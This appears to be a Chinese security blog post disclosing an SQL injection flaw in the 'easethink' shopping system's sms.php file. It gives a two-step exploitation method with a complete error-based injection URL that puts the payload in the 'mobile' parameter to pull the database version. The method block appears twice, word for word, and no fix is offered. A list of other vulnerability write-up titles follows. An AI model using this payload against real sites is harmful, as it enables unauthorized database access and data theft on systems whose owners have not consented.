easethink购物系统 sms.php 文件注射漏洞

2019年12月31日19:57:32评论403 views字数 529阅读1分45秒阅读模式

摘要

可以看到没做过滤
------------------------------------
利用方法如下
1. http://demo.easethink.com/sms.php?act=subscribe 首先获得验证码！将其拼接到下一步中的verify
2. http://demo.easethink.com/sms.php?act=do_subscribe&verify=这里是获得的验证码填写地址&mobile=111'and(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23

可以看到没做过滤
------------------------------------
利用方法如下
1.http://demo.easethink.com/sms.php?act=subscribe 首先获得验证码！将其拼接到下一步中的verify
2. http://demo.easethink.com/sms.php?act=do_subscribe&verify=这里是获得的验证码填写地址&mobile=111'and(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23

ok，没图没真相，上测试图

-----------------------------------------------------------------------

by：kk

左青龙
微信扫一扫

右白虎
微信扫一扫

easethink购物系统 sms.php 文件注射漏洞

微擎普通用户权限SQL注入漏洞

无需登录-悟空CRM 存储型XSS

cacti 0.8.8g cdef.php selected_items 存在sql注入

ZwelL通用图片上传漏洞

discuz某插件设计缺陷可前台getshell

Seacmsv6.25 two sql inject

深信服数据中心2.0某处存在命令执行漏洞

Z-blog前台无需登录包含漏洞一枚

发表评论

在线咨询

微信